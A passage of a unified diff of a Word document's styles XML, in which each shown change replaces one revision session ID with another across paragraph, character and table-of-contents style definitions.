-    <w:rsid w:val="00101052"/>
+    <w:rsid w:val="00CD7F55"/>
     <w:pPr>
       <w:tabs>
         <w:tab w:val="left" w:pos="5040"/>
@@ -8960,7 +9042,7 @@
   <w:style w:type="paragraph" w:customStyle="1" w:styleId="Outlinenumbering">
     <w:name w:val="Outline numbering"/>
     <w:basedOn w:val="Normal"/>
-    <w:rsid w:val="00101052"/>
+    <w:rsid w:val="00CD7F55"/>
     <w:pPr>
       <w:numPr>
         <w:numId w:val="1"/>
@@ -8978,7 +9060,7 @@
   <w:style w:type="paragraph" w:customStyle="1" w:styleId="NumberedHeading2">
     <w:name w:val="Numbered Heading 2"/>
     <w:basedOn w:val="Normal"/>
-    <w:rsid w:val="00101052"/>
+    <w:rsid w:val="00CD7F55"/>
     <w:pPr>
       <w:numPr>
         <w:numId w:val="2"/>
@@ -8988,12 +9070,12 @@
   <w:style w:type="character" w:styleId="PageNumber">
     <w:name w:val="page number"/>
     <w:basedOn w:val="DefaultParagraphFont"/>
-    <w:rsid w:val="00101052"/>
+    <w:rsid w:val="00CD7F55"/>
   </w:style>
   <w:style w:type="character" w:styleId="Hyperlink">
     <w:name w:val="Hyperlink"/>
     <w:uiPriority w:val="99"/>
-    <w:rsid w:val="00101052"/>
+    <w:rsid w:val="00CD7F55"/>
     <w:rPr>
       <w:color w:val="0000FF"/>
       <w:u w:val="single"/>
@@ -9001,7 +9083,7 @@
   </w:style>
   <w:style w:type="character" w:styleId="FollowedHyperlink">
     <w:name w:val="FollowedHyperlink"/>
-    <w:rsid w:val="00101052"/>
+    <w:rsid w:val="00CD7F55"/>
     <w:rPr>
       <w:color w:val="800080"/>
       <w:u w:val="single"/>
@@ -9012,7 +9094,7 @@
     <w:basedOn w:val="Normal"/>
     <w:uiPriority w:val="34"/>
     <w:qFormat/>
-    <w:rsid w:val="00101052"/>
+    <w:rsid w:val="00CD7F55"/>
     <w:pPr>
       <w:ind w:left="720"/>
     </w:pPr>
@@ -9024,7 +9106,7 @@
     <w:uiPriority w:val="39"/>
     <w:unhideWhenUsed/>
     <w:qFormat/>
-    <w:rsid w:val="00101052"/>
+    <w:rsid w:val="00CD7F55"/>
     <w:pPr>
       <w:keepLines/>
       <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
@@ -9041,7 +9123,7 @@
     <w:name w:val="Code"/>
     <w:basedOn w:val="Normal"/>
     <w:qFormat/>
-    <w:rsid w:val="00101052"/>
+    <w:rsid w:val="00CD7F55"/>
     <w:pPr>
       <w:spacing w:before="80" w:line="240" w:lineRule="auto"/>
     </w:pPr>
@@ -9056,7 +9138,7 @@
     <w:autoRedefine/>
     <w:uiPriority w:val="39"/>
     <w:unhideWhenUsed/>
-    <w:rsid w:val="00101052"/>
+    <w:rsid w:val="00CD7F55"/>
     <w:pPr>
       <w:spacing w:after="100" w:line="240" w:lineRule="auto"/>
     </w:pPr>
@@ -9068,7 +9150,7 @@
     <w:autoRedefine/>
     <w:uiPriority w:val="39"/>
     <w:unhideWhenUsed/>
-    <w:rsid w:val="00101052"/>
+    <w:rsid w:val="00CD7F55"/>
     <w:pPr>
       <w:spacing w:after="100" w:line="240" w:lineRule="auto"/>
       <w:ind w:left="202"/>
@@ -9082,7 +9164,7 @@
     <w:uiPriority w:val="39"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
-    <w:rsid w:val="00101052"/>
+    <w:rsid w:val="00CD7F55"/>
     <w:pPr>
       <w:spacing w:after="100" w:line="240" w:lineRule="auto"/>
       <w:ind w:left="403"/>
